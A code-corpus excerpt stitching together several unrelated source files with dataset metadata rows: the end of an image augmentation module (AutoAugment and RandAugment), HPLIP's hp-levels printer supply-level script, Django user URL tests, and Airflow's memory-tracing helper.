[("SolarizeIncreasing", 0.6, 5), ("AutoContrast", 0.6, 5)],
[("Invert", 0.6, 4), ("Equalize", 1.0, 8)],
[("Color", 0.6, 4), ("Contrast", 1.0, 8)],
[("Equalize", 0.8, 8), ("Equalize", 0.6, 3)],
]
reparam_policy = []
for policy in policy_list:
sub_pol = []
for pol in policy:
augment, prob, magnitude = pol
augment_fn, _, reparam_fn = AUTOAUGMENT_MAP[augment]
if reparam_fn is not None:
magnitude = reparam_fn(magnitude)
sub_pol.append(augment_fn(magnitude, p=prob))
else:
sub_pol.append(augment_fn(p=prob))
reparam_policy.append(sub_pol)
return reparam_policy
class AutoAugment:
def __init__(self, policy):
self.policy = policy
def __call__(self, img):
selected_policy = random.choice(self.policy)
for pol in selected_policy:
sample = pol.sample()
img = pol.apply_img(img, **sample)
return img
def __repr__(self):
return f"{self.__class__.__name__}(\n{self.policy}\n)"
def check(self, img):
log = []
selected_policy = random.choice(self.policy)
for pol in selected_policy:
sample = pol.sample()
img, check = pol.apply_img_check(img, **sample)
log.append((pol, sample, check))
return img, log
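# Illustrative sketch (editor's addition, not part of the original file): wiring the policy
# above into AutoAugment and applying it to a single PIL image. The image path is a
# hypothetical placeholder.
def _autoaugment_example(image_path="example.jpg"):
    augment = AutoAugment(autoaugment_policy())
    img = Image.open(image_path).convert("RGB")
    return augment(img)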
class RandAugment:
def __init__(
self,
n_augment,
magnitude,
translate=100,
cutout=40,
fillcolor=(128, 128, 128),
increasing=False,
magnitude_std=0,
):
self.n_augment = n_augment
self.magnitude = magnitude
self.translate = translate
self.fillcolor = fillcolor
self.magnitude_std = magnitude_std
# fmt: off
if increasing:
augment_list = [
"AutoContrast", "Equalize", "Invert", "Rotate",
"PosterizeIncreasing", "SolarizeIncreasing",
"Color", "Contrast", "Brightness", "Sharpness", "ShearX",
"ShearY", "TranslateX", "TranslateY", "Cutout", "SolarizeAdd",
]
else:
augment_list = [
"AutoContrast", "Equalize", "Invert", "Rotate", "Posterize", "Solarize",
"Color", "Contrast", "Brightness", "Sharpness", "ShearX",
"ShearY", "TranslateX", "TranslateY", "Cutout", "SolarizeAdd",
]
# fmt: on
if cutout == 0:
augment_list.remove("Cutout")
self.cutout = cutout
self.translate = translate
self.fillcolor = fillcolor
self.augment = []
for augment in augment_list:
_, augment_fn, reparam_fn = AUTOAUGMENT_MAP[augment]
reparam_fn_param = {}
augment_fn_param = {}
if reparam_fn is not None:
if augment in ("TranslateX", "TranslateY"):
reparam_fn_param = {"max_translate": translate}
elif augment == "Cutout":
reparam_fn_param = {"cutout": cutout}
if augment in (
"TranslateX",
"TranslateY",
"ShearX",
"ShearY",
"Rotate",
"Cutout",
):
augment_fn_param = {"fillcolor": fillcolor}
self.augment.append(
(augment_fn, reparam_fn, augment_fn_param, reparam_fn_param)
)
def __repr__(self):
return (
f"{self.__class__.__name__}(n_augment={self.n_augment}, magnitude={self.magnitude}, cutout={self.cutout},"
f" translate={self.translate}, fillcolor={self.fillcolor})"
)
def __call__(self, img):
augments = random.choices(self.augment, k=self.n_augment)
for augment, mag_fn, aug_param, reparam_param in augments:
if mag_fn is not None:
if self.magnitude_std > 0:
mag = random.normalvariate(self.magnitude, self.magnitude_std)
else:
mag = self.magnitude
mag = mag_fn(mag, **reparam_param)
img = augment(img, mag, **aug_param)
else:
img = augment(img, **aug_param)
return img
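# Illustrative sketch (editor's addition): RandAugment used the same way; n_augment=2 and
# magnitude=9 are arbitrary example settings, not values taken from the original file.
def _randaugment_example(image):
    augment = RandAugment(n_augment=2, magnitude=9, increasing=True)
    return augment(image)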
| 28.325479 | 119 | 0.578901 |
fc4b200914fc5b2f27202d342d2a2b0c08caa342 | 7,020 | py | Python |
hplip-3.20.3/levels.py | Deril-Pana/wikiBlackcoinNL | 9633307f0b485c27feae5da242944adf450e8963 | ["MIT"] | null | null | null |
hplip-3.20.3/levels.py | Deril-Pana/wikiBlackcoinNL | 9633307f0b485c27feae5da242944adf450e8963 | ["MIT"] | 1 | 2021-11-20T16:33:39.000Z | 2021-11-20T16:33:39.000Z |
hplip-3.20.3/levels.py | Deril-Pana/wikiBlackcoinNL | 9633307f0b485c27feae5da242944adf450e8963 | ["MIT"] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# (c) Copyright 2003-2015 HP Development Company, L.P.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Author: Don Welch
#
__version__ = '2.0'
__title__ = 'Supply Levels Utility'
__mod__ = 'hp-levels'
__doc__ = "Display bar graphs of current supply levels for supported HPLIP printers."
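# Usage sketch (editor's note): only the extra options registered in this file are shown;
# the target device is selected through the standard HPLIP device arguments.
#
#   hp-levels -s40 -c -a'#'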
# Std Lib
import sys
import getopt
import time
import operator
import os
# Local
from base.g import *
from base import device, status, utils, tui, module
from prnt import cups
DEFAULT_BAR_GRAPH_SIZE = 8*(tui.ttysize()[1])/10
def logBarGraph(agent_level, agent_type, size=DEFAULT_BAR_GRAPH_SIZE, use_colors=True, bar_char='/'):
#print agent_level, agent_type, size, use_colors, bar_char
adj = 100.0/size
if adj==0.0: adj=100.0
bar = int(agent_level/adj)
size = int(size)
if bar > (size-2): bar = size-2
if use_colors:
if agent_type in (AGENT_TYPE_CMY, AGENT_TYPE_KCM, AGENT_TYPE_CYAN, AGENT_TYPE_CYAN_LOW):
log.info(log.codes['teal'])
elif agent_type in (AGENT_TYPE_MAGENTA, AGENT_TYPE_MAGENTA_LOW):
log.info(log.codes['fuscia'])
elif agent_type in (AGENT_TYPE_YELLOW, AGENT_TYPE_YELLOW_LOW):
log.info(log.codes['yellow'])
elif agent_type == AGENT_TYPE_BLUE:
log.info(log.codes['blue'])
elif agent_type in (AGENT_TYPE_BLACK, AGENT_TYPE_BLACK_B8800):
log.info(log.codes['bold'])
elif agent_type in (AGENT_TYPE_LG, AGENT_TYPE_G, AGENT_TYPE_PG):
pass
color = ''
if use_colors:
if agent_type in (AGENT_TYPE_CMY, AGENT_TYPE_KCM):
color = log.codes['fuscia']
log.info(("-"*(size))+color)
color = ''
if use_colors:
if agent_type in (AGENT_TYPE_CMY, AGENT_TYPE_KCM):
color = log.codes['yellow']
log.info("%s%s%s%s (approx. %d%%)%s" % ("|", bar_char*bar,
" "*((size)-bar-2), "|", agent_level, color))
color = ''
if use_colors:
color = log.codes['reset']
log.info(("-"*int(size))+color)
#log.info(("-"*(size))+color)
log.set_module('hp-levels')
try:
mod = module.Module(__mod__, __title__, __version__, __doc__, None,
(INTERACTIVE_MODE,))
mod.setUsage(module.USAGE_FLAG_DEVICE_ARGS,
extra_options=[
("Bar graph size:", "-s<size> or --size=<size> (current default=%d)" % DEFAULT_BAR_GRAPH_SIZE, "option", False),
("Use colored bar graphs:", "-c or --color (default is colorized)", "option", False),
("Bar graph character:", "-a<char> or --char=<char> (default is '/')", "option", False)])
opts, device_uri, printer_name, mode, ui_toolkit, lang = \
mod.parseStdOpts('s:ca:', ['size=', 'color', 'char='])
device_uri = mod.getDeviceUri(device_uri, printer_name)
if not device_uri:
sys.exit(1)
log.info("Using device : %s\n" % device_uri)
size = DEFAULT_BAR_GRAPH_SIZE
color = True
bar_char = '/'
for o, a in opts:
if o in ('-s', '--size'):
try:
size = int(a.strip())
except (TypeError, ValueError):
log.warn("Invalid size specified. Using the default of %d" % DEFAULT_BAR_GRAPH_SIZE)
size = DEFAULT_BAR_GRAPH_SIZE
if size < 1 or size > DEFAULT_BAR_GRAPH_SIZE:
log.warn("Invalid size specified. Using the default of %d" % DEFAULT_BAR_GRAPH_SIZE)
size = DEFAULT_BAR_GRAPH_SIZE
elif o in ('-c', '--color'):
color = True
elif o in ('-a', '--char'):
try:
bar_char = a[0]
            except IndexError:
bar_char = '/'
try:
d = device.Device(device_uri, printer_name)
except Error:
log.error("Error opening device. Exiting.")
sys.exit(1)
try:
try:
d.open()
d.queryDevice()
except Error as e:
log.error("Error opening device (%s). Exiting." % e.msg)
sys.exit(1)
if d.mq['status-type'] != STATUS_TYPE_NONE:
log.info("")
sorted_supplies = []
a = 1
while True:
try:
agent_type = int(d.dq['agent%d-type' % a])
agent_kind = int(d.dq['agent%d-kind' % a])
agent_sku = d.dq['agent%d-sku' % a]
log.debug("%d: agent_type %d agent_kind %d agent_sku '%s'" % (a, agent_type, agent_kind, agent_sku))
except KeyError:
break
else:
sorted_supplies.append((a, agent_kind, agent_type, agent_sku))
a += 1
sorted_supplies.sort(key=utils.cmp_to_key(utils.levelsCmp))
for x in sorted_supplies:
a, agent_kind, agent_type, agent_sku = x
agent_health = d.dq['agent%d-health' % a]
agent_level = d.dq['agent%d-level' % a]
agent_desc = d.dq['agent%d-desc' % a]
agent_health_desc = d.dq['agent%d-health-desc' % a]
if agent_health in (AGENT_HEALTH_OK, AGENT_HEALTH_UNKNOWN) and \
agent_kind in (AGENT_KIND_SUPPLY,
AGENT_KIND_HEAD_AND_SUPPLY,
AGENT_KIND_TONER_CARTRIDGE,
AGENT_KIND_MAINT_KIT,
AGENT_KIND_ADF_KIT,
AGENT_KIND_INT_BATTERY,
AGENT_KIND_DRUM_KIT,):
log.info(log.bold(agent_desc))
log.info("Part No.: %s" % agent_sku)
log.info("Health: %s" % agent_health_desc)
logBarGraph(agent_level, agent_type, size, color, bar_char)
log.info("")
else:
log.info(log.bold(agent_desc))
log.info("Part No.: %s" % agent_sku)
log.info("Health: %s" % agent_health_desc)
log.info("")
else:
log.error("Status not supported for selected device.")
sys.exit(1)
finally:
d.close()
except KeyboardInterrupt:
log.error("User exit")
log.info("")
log.info("Done.")
| 33.270142 | 120 | 0.569088 |
5732f4a8ad70e684c865c19dac06c365c19865af | 660 | py | Python |
portxpress/users/tests/test_urls.py | zoeinola/PortXpress | c69d9071e36a87942c3bba63a3ef079d06fe7baf | ["MIT"] | null | null | null |
portxpress/users/tests/test_urls.py | zoeinola/PortXpress | c69d9071e36a87942c3bba63a3ef079d06fe7baf | ["MIT"] | null | null | null |
portxpress/users/tests/test_urls.py | zoeinola/PortXpress | c69d9071e36a87942c3bba63a3ef079d06fe7baf | ["MIT"] | null | null | null |
import pytest
from django.urls import resolve, reverse
from portxpress.users.models import User
pytestmark = pytest.mark.django_db
def test_detail(user: User):
assert (
reverse("users:detail", kwargs={"username": user.username})
== f"/users/{user.username}/"
)
assert resolve(f"/users/{user.username}/").view_name == "users:detail"
def test_update():
assert reverse("users:update") == "/users/~update/"
assert resolve("/users/~update/").view_name == "users:update"
def test_redirect():
assert reverse("users:redirect") == "/users/~redirect/"
assert resolve("/users/~redirect/").view_name == "users:redirect"
| 26.4 | 74 | 0.677273 |
ba3576e3933e8a81e662bbb41c57c494fb0e2401 | 2,467 | py | Python |
scripts/perf/perf_kit/memory.py | troywinter/airflow | ba66ba0d97941c55d9f00f66329a9d3c7ad673e7 | ["Apache-2.0"] | 3 | 2015-08-25T13:56:44.000Z | 2020-03-21T10:26:58.000Z |
scripts/perf/perf_kit/memory.py | troywinter/airflow | ba66ba0d97941c55d9f00f66329a9d3c7ad673e7 | ["Apache-2.0"] | 37 | 2020-07-21T07:50:02.000Z | 2022-03-29T22:31:28.000Z |
scripts/perf/perf_kit/memory.py | vuppalli/airflow | dfe8337ca2d3ed173d9ecc112938271519792c40 | ["Apache-2.0"] | 4 | 2020-07-17T14:02:28.000Z | 2022-02-23T04:29:58.000Z |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import gc
import os
from contextlib import contextmanager
import psutil
def _get_process_memory():
process = psutil.Process(os.getpid())
return process.memory_info().rss
def _human_readable_size(size, decimal_places=3):
for unit in ["B", "KiB", "MiB", "GiB", "TiB"]:
if size < 1024.0:
break
size /= 1024.0
return f"{size:.{decimal_places}f}{unit}"
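# For example (editor's note), _human_readable_size(3_500_000) returns "3.338MiB".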
class TraceMemoryResult:
def __init__(self):
self.before = 0
self.after = 0
self.value = 0
@contextmanager
def trace_memory(human_readable=True, gc_collect=False):
"""
    Calculates the difference in process memory usage (RSS) before and after the wrapped
    code block runs; in other words, how much memory the code inside the block consumed.
    :param human_readable: If True, the result is printed in human-readable units;
        otherwise it is printed in bytes.
    :param gc_collect: If True, the garbage collector is run before each measurement.
"""
if gc_collect:
gc.collect()
before = _get_process_memory()
result = TraceMemoryResult()
try:
yield result
finally:
if gc_collect:
gc.collect()
after = _get_process_memory()
diff = after - before
result.before = before
result.after = after
result.value = diff
if human_readable:
human_diff = _human_readable_size(diff)
print(f"Memory: {human_diff}")
else:
print(f"Memory: {diff} bytes")
if __name__ == "__main__":
# Example:
with trace_memory():
import airflow # noqa # pylint: disable=unused-import
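    # A fuller sketch (editor's addition, assuming nothing beyond the code above): the
    # yielded TraceMemoryResult can be inspected after the block exits, e.g. in a test.
    with trace_memory(human_readable=False) as result:
        payload = [object() for _ in range(100_000)]  # allocate something measurable
    print(f"before={result.before} after={result.after} diff={result.value} bytes")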
| 29.722892 | 97 | 0.679773 |